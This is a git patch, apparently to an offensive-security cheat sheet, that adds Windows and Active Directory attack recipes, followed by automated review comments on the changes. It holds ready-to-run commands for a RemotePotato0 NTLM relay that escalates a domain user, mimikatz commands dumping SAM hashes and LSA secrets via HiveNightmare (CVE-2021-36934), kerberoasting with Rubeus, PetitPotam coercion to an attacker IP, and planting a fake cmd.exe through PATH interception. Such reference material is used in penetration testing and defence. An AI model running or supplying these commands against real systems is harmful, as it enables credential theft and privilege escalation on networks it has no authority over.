From d9d4a54d03a39e0b42b10e6fcc719a48af8054d1 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 26 Jul 2021 21:25:56 +0200 Subject: [PATCH] RemotePotato0 + HiveNightmare --- .../Active Directory Attack.md | 30 ++++++- .../Windows - Privilege Escalation.md | 80 +++++++++++++------ 2 files changed, 85 insertions(+), 25 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index b4c8b11..403768c 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -61,6 +61,7 @@ - [SMB Signing Disabled and IPv6](#smb-signing-disabled-and-ipv6) - [Drop the MIC](#drop-the-mic) - [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384) + - [RemotePotato0 DCOM DCE RPC relay](#remotepotato0-dcom-dce-rpc-relay) - [AD CS Relay Attack](#ad-cs-relay-attack) - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces) @@ -1380,8 +1381,16 @@ Any valid domain user can request a kerberos ticket (TGS) for any domain service * [Rubeus](https://github.com/GhostPack/Rubeus) ```powershell + # Stats + Rubeus.exe kerberoast /stats + ------------------------------------- ---------------------------------- + | Supported Encryption Type | Count | | Password Last Set Year | Count | + ------------------------------------- ---------------------------------- + | RC4_HMAC_DEFAULT | 1 | | 2021 | 1 | + ------------------------------------- ---------------------------------- + # Kerberoast (RC4 ticket) - .\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD /outfile:hash.txt + Rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD /outfile:hash.txt # Kerberoast (AES ticket) # Accounts with AES enabled in msDS-SupportedEncryptionTypes will have RC4 tickets requested. 
@@ -1737,6 +1746,23 @@ Using a modified version of ntlmrelayx : https://shenaniganslabs.io/files/impack ntlmrelayx -smb2support --no-smb-server --gpotato-startup rat.exe ``` +#### RemotePotato0 DCOM DCE RPC relay + +> It abuses the DCOM activation service and trigger an NTLM authentication of the user currently logged on in the target machine + +Requirement: + +* a shell in session 0 (e.g. WinRm shell or SSH shell) +* a privileged user is logged on in the session 1 (e.g. a Domain Admin user) + +```powershell +# https://github.com/antonioCoco/RemotePotato0/ +Terminal> sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:192.168.83.131:9998 & # Can be omitted for Windows Server <= 2016 +Terminal> sudo ntlmrelayx.py -t ldap://192.168.83.135 --no-wcf-server --escalate-user winrm_user_1 +Session0> RemotePotato0.exe -r 192.168.83.130 -p 9998 -s 2 +Terminal> psexec.py 'LAB/winrm_user_1:Password123!@192.168.83.135' +``` + #### AD CS Relay Attack Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101) @@ -1748,7 +1774,7 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101 # template workstation, DomainController, Machine # Coerce the authentication via MS-ESFRPC EfsRpcOpenFileRaw function with petitpotam - # You can also use any other way to coerce the authentication like printspooler + # You can also use any other way to coerce the authentication like PrintSpooler via MS-RPRN git clone https://github.com/topotam/PetitPotam python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index d8cb00a..832ed73 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md 
@@ -14,6 +14,7 @@ * [Default Writeable Folders](#default-writeable-folders) * [EoP - Looting for passwords](#eop---looting-for-passwords) * [SAM and SYSTEM files](#sam-and-system-files) + * [HiveNightmare](#hivenightmare) * [Search for file contents](#search-for-file-contents) * [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename) * [Search the registry for key names and passwords](#search-the-registry-for-key-names-and-passwords) @@ -28,6 +29,7 @@ * [EoP - Incorrect permissions in services](#eop---incorrect-permissions-in-services) * [EoP - Windows Subsystem for Linux (WSL)](#eop---windows-subsystem-for-linux-wsl) * [EoP - Unquoted Service Paths](#eop---unquoted-service-paths) +* [EoP - $PATH Interception](#eop---path-interception) * [EoP - Named Pipes](#eop---named-pipes) * [EoP - Kernel Exploitation](#eop---kernel-exploitation) * [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated) 
@@ -384,7 +386,37 @@ pwdump SYSTEM SAM > /root/sam.txt samdump2 SYSTEM SAM -o sam.txt ``` -Then crack it with `john -format=NT /root/sam.txt`. +Either crack it with `john -format=NT /root/sam.txt` or use Pass-The-Hash. + + +### HiveNightmare + +> CVE-2021–36934 allows you to retrieve all registry hives (SAM,SECURITY,SYSTEM) in Windows 10 and 11 as a non-administrator user + +Check for the vulnerability using `icacls` + +```powershell +C:\Windows\System32> icacls config\SAM +config\SAM BUILTIN\Administrators:(I)(F) + NT AUTHORITY\SYSTEM:(I)(F) + BUILTIN\Users:(I)(RX) <-- this is wrong - regular users should not have read access! +``` + +Then exploit the CVE by requesting the shadowcopies on the filesystem and reading the hives from it. + +```powershell +mimikatz> token::whoami /full + +# List shadow copies available +mimikatz> misc::shadowcopies + +# Extract account from SAM databases +mimikatz> lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM + +# Extract secrets from SECURITY +mimikatz> lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY +``` + ### Search for file contents 
@@ -794,6 +826,30 @@ For `C:\Program Files\something\legit.exe`, Windows will try the following paths - `C:\Program.exe` - `C:\Program Files.exe` + +## EoP - $PATH Interception + +Requirements: +- PATH contains a writeable folder with low privileges. +- The writeable folder is _before_ the folder that contains the legitimate binary. + +EXAMPLE: +```powershell +# List contents of the PATH environment variable +# EXAMPLE OUTPUT: C:\Program Files\nodejs\;C:\WINDOWS\system32 +$env:Path + +# See permissions of the target folder +# EXAMPLE OUTPUT: BUILTIN\Users: GR,GW +icacls.exe "C:\Program Files\nodejs\" + +# Place our evil-file in that folder. +copy evil-file.exe "C:\Program Files\nodejs\cmd.exe" +``` + +Because (in this example) "C:\Program Files\nodejs\" is _before_ "C:\WINDOWS\system32\" on the PATH variable, the next time the user runs "cmd.exe", our evil version in the nodejs folder will run, instead of the legitimate one in the system32 folder. + + ## EoP - Named Pipes 1. Find named pipes: `[System.IO.Directory]::GetFiles("\\.\pipe\")` 
@@ -1257,28 +1313,6 @@ Failing on : Detailed information about the vulnerability : https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege -## EoP - $PATH Interception - -Requirements: -- PATH contains a writeable folder with low privileges. -- The writeable folder is _before_ the folder that contains the legitimate binary. - -EXAMPLE: -``` -//(Powershell) List contents of the PATH environment variable -//EXAMPLE OUTPUT: C:\Program Files\nodejs\;C:\WINDOWS\system32 -$env:Path - -//See permissions of the target folder -//EXAMPLE OUTPUT: BUILTIN\Users: GR,GW -icacls.exe "C:\Program Files\nodejs\" - -//Place our evil-file in that folder. -copy evil-file.exe "C:\Program Files\nodejs\cmd.exe" -``` - -Because (in this example) "C:\Program Files\nodejs\" is _before_ "C:\WINDOWS\system32\" on the PATH variable, the next time the user runs "cmd.exe", our evil version in the nodejs folder will run, instead of the legitimate one in the system32 folder. - ## References * [Windows Internals Book - 02/07/2017](https://docs.microsoft.com/en-us/sysinternals/learn/windows-internals)
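Review bot: the new `Rubeus.exe kerberoast /stats` entry at the top of the kerberoast block pastes the output table without saying what the two tables mean; a one-line comment that `/stats` summarises the encryption types and the password-last-set years of the roastable accounts (the same data a defender reviews when hunting for RC4-only service accounts with stale passwords) would make the example self-explanatory. The change from `.\rubeus.exe` to `Rubeus.exe` on the following command is consistent with the new line.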
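Review bot: in the added RemotePotato0 section, "Requirement:" introduces two bullets and the quoted description reads "abuses the DCOM activation service and trigger an NTLM authentication"; make it "Requirements:" and "triggers". The command block uses three addresses (192.168.83.130, 192.168.83.131 and 192.168.83.135) without stating which is the box running `socat`/`ntlmrelayx.py`, which is the machine where `RemotePotato0.exe` runs and listens on port 9998, and which is the LDAP relay target; a comment per address, or `$ATTACKER_IP`/`$TARGET_IP` placeholders as the AD CS block below already uses, would remove the guesswork. The trailing comment "Can be omitted for Windows Server <= 2016" on the `socat` line would also read better as a full-line comment above the command, where it cannot be mistaken for part of the shell command.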
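Review bot: the HiveNightmare section writes the identifier as `CVE-2021–36934` with an en-dash (U+2013) between year and number, which breaks search and links; use the ASCII hyphen, `CVE-2021-36934`. The two `lsadump::` commands hard-code `HarddiskVolumeShadowCopy1` even though the preceding `misc::shadowcopies` line is there to enumerate the copies; say that the index must be taken from that output and that no copy may exist at all, in which case the hives are not exposed. Since the section starts from a wrong ACL (`BUILTIN\Users:(I)(RX)` on `config\SAM`), a closing pointer to the remediation would round it off: the ACL on the `config` directory must be restored and, because shadow copies taken before the fix still carry the readable hives, existing shadow copies deleted as well.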
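Review bot: in the relocated "EoP - $PATH Interception" section, the first requirement "PATH contains a writeable folder with low privileges" is ambiguous; "a folder writeable by low-privileged users" is what the `icacls.exe` example output (`BUILTIN\Users: GR,GW`) demonstrates. The heading keeps the Unix spelling `$PATH` while the code reads `$env:Path`; `%PATH%` or `$env:Path` in the title would match the platform. Tagging the fence `powershell` and switching the comments from `//` to `#` is the right fix, and the paired removal at the old location keeps the page free of a duplicate section.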